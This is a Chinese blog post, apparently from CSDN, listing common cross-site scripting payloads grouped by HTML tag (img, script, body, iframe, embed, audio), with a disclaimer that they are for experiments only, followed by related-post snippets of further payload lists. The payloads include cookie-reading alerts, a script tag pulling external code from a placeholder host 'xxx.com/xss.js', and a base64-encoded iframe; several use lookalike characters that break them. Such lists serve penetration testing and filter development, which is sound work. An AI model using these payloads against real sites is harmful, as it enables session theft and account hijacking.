xss 常用语句

已于 2024-03-28 16:57:25 修改
阅读量876 收藏 9
点赞数 8
文章标签: javascript 前端 html
于 2024-03-28 16:53:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/adzz9/article/details/137117371
版权
本文详细列举了各种HTML标签中可能存在的XSS注入点,如<img>、<script>、<body>、<iframe>、<embed>等,并提醒读者这些代码可能导致的安全威胁。作者强调实验性质,同时指出滥用可能导致的实际后果并非作者责任。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

<img> 标签:
<img src=1 οnerrοr=alert(document.cookie)>    //弹cookie
<img src=1 οnerrοr=alert(/hck/)>
<img src=1 οnerrοr=alert("hck")>
<img src=1 οnerrοr=alert(123)>    //对于数字,可以不用引导
<img src="javascript:alert("xss");">
<img dynsrc="javascript:alert('xss')">
<img lowsrc="javascript:alert('xss')">

script标签:
<script>alert(1)<script>
<script src=http://xxx.com/xss.js></script>   //引用外部的xss
<script> alert("hack")</script>   
<script> alert(document.cookie)</script>

body 标签:
<body οnlοad=alert("xss")>
<body background="javascript:alert("xss")">


iframe 标签:
<iframe srcdoc="<img src=x οnerrοr=alert(document.domain)>"></frame>     --弹ip
<iframe srcdoc="<img src=x οnerrοr=alert(1)>"></frame>

<embed src=//14.rs>   ---绕过的可能性很大,
<audio controls onduratiοnchange=print(1) id=bngvse><source src=1.mp3 type=audio/mpeg></audio>
<iFrAme/src=jaVascRipt:alert.bind()(1) class=bngvse></iFramE>
<iframe srcdoc="<input onauxclick=alert(1)>" class=bngvse></iframe>

点击:
<button src=1 οnclick=alert("你好")>

<img/src=1 οnerrοr=alert(1) />       --反射型
<a href="javascript:confirm('a')" >1</a >
<iframe src=    "javascript:alert('iframe')" width    = "0" height        = "0"/>
–!><script>prompt(1)</script>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYmFzZTY0X2lmcmFtZScpPC9zY3JpcHQ+">

声明:以上xss语句仅用于实验,利用以上语句对某用户、企业、业务造成影响的,一切与作者无关。

D8 跨站脚本(XSS)(附XSS注入常用语句
m0_60071324的博客
08-11 1509
跨站脚本 (XSS) 攻击发生在 数据通过不受信任的来源(最常见的是 Web 请求)进入 Web 应用程序。 数据包含在发送给 Web 用户的动态内容中,而无需针对恶意内容进行验证。 发送到网络浏览器的恶意内容通常采用一段 JavaScript 的形式,但也可能包括 HTML、Flash 或浏览器可能执行的任何其他类型的代码。基于 XSS 的攻击种类几乎是无限的,但它们通常包括向攻击者传输隐私数据,如 cookie 或其他会话信息,将受害者重定向到攻击者控制的网页内容,或在用户机器上执行其他恶意操作以易
xss常用攻击语法
weixin_47156475的博客
08-11 3045
常用: <script>alert(1)</script> <img src=x onerror=alert(1)> <svg onload=alert(1)> <a href=javascript:alert(1)> <script>alter('dreeee')</script>; 用于探测的万能语句: <SCRscriptIPT>'"()Oonnjavascript 标签溢出: "> &lt
细说XSS
LainWith的博客
08-24 2209
什么是XSS 跨站脚本(Cross-Site Scripting,XSS)是一种经常出现在Web应用程序中的计算机安全漏洞,是由于Web应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码(通常包括HTML代码和客户端Javascript脚本)注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害用户可能采取Cookie资料窃取、会话劫持、钓鱼欺骗等各种攻击。 通常情况下,我们既可以把跨站脚本理解成一种Web安全漏洞,也可以理解成一种攻击手段。 XSS跨站脚本攻击本身
网站XSS跨站攻击脚本语法
callofdutyops的专栏
02-01 1748
XSS又叫CSS (Cross-Site Script) ,跨站脚本攻击。恶意攻击者往Web页面里插入恶意html代码 当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 XSS分两类: 一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。 另一类则是来自外部的攻击,主要指的
XSS 常用标签及绕过姿势总结
最新发布
lza20001103的博客
02-12 1576
XSS 常用标签及绕过姿势总结
XSS测试语句大全
08-07
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
XSS语句大全
ch_ycc的博客
04-24 3437
10、t_sort="type="button" onfocus="alert(1) onfocus-当窗口获得焦点时运行脚本。13、Cookies传 user=" onclick="alert(1)" type="text"12、User agent传 "type="button" onclick="alert(1)11、Referer传" type="button" onclick="alert(1)转化为实体字符: javascript:alert('xss')
xss 语句大全
kaosini的专栏
06-12 1657
转载地址:http://blog.sina.com.cn/s/blog_3f595e9e010007pf.html alert(document.cookie) ='>cript>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3C/script%3E
XSS注入常用语句
weixin_33763244的博客
03-14 715
<script>alert('hello,gaga!');</script> //经典语句,哈哈! >"'><img src="javascript.:alert('XSS')"> >"'><script>alert('XSS')</script> <table background='jav...
XSS语句
selecthch的博客
08-29 7781
<img src=1 onerror=alert(1)> <script>alert(1)</script> <script>alert(/1/)</script> "/><svg/onload=prompt(/1/);> <input id="aaa" type="text" value="输出点"&gt...
常用XSS检查语句
11-09
以下是一些常用XSS检查语句: 1. **基本的HTML注入测试**: ```html <script>alert('XSS'); ``` 这个语句会在用户的浏览器上弹出一个警告对话框,显示"XSS"。如果这个字符串未经过滤或转义,就可能被插入到...
XSS攻击常用语句集合
"此资源主要包含了各种XSS(跨站脚本攻击)的示例语句,用于网站安全测试,帮助检测XSS漏洞。通过这些预设的攻击语句,可以快速检验网页是否对用户输入进行了充分的过滤和转义,以防止恶意脚本被执行,保护用户数据...
xss攻击语句大全。。
04-16
网站安全测试。。xss漏洞。。免去你输入的麻烦。可以直接复制粘贴。。
xss常用的select语句
01-11
然而,需要注意的是,XSS 攻击并不直接涉及 SQL 查询语句;这两种攻击方式属于不同类型的Web漏洞。 对于反射型 XSS 而言,在某些情况下,如果应用程序未能正确过滤用户输入并将其反映回浏览器,则可能允许恶意脚本...
XSS | XSS 常用语句以及绕过思路
Blue17 の 小窝
10-01 4147
以确保文本在不同系统之间可以无差错的转换和显示。由于 ASCII 码已经广泛使用并且很好地满足了英文字符的编码需求,Unicode 在设计时决定保留 ASCII 编码的字符集,并将其作为 Unicode 编码的一个子集。因此,
xss测试语句大全
imhacket0day的博客
08-28 5133
常见xss测试语句大全 '><script>alert(1)</script> <sc<script>ript>alert(/xss/)</script> "> <script>alert(1)</script> ='><script>alert(1)</script> %3Cscript%3Ealert(1)%3C/script%3E <script>al...
xss语句
xz152621的博客
11-01 275
<img src=1 οnerrοr=alert(1)> <script>alert(1)</script> <script>alert(/1/)</script> "/><svg/οnlοad=prompt(/1/);> <input id="aaa" type="text" value="输出点"> <a herf="输出点"><img src=1>"> </
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

柳岸花又明

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值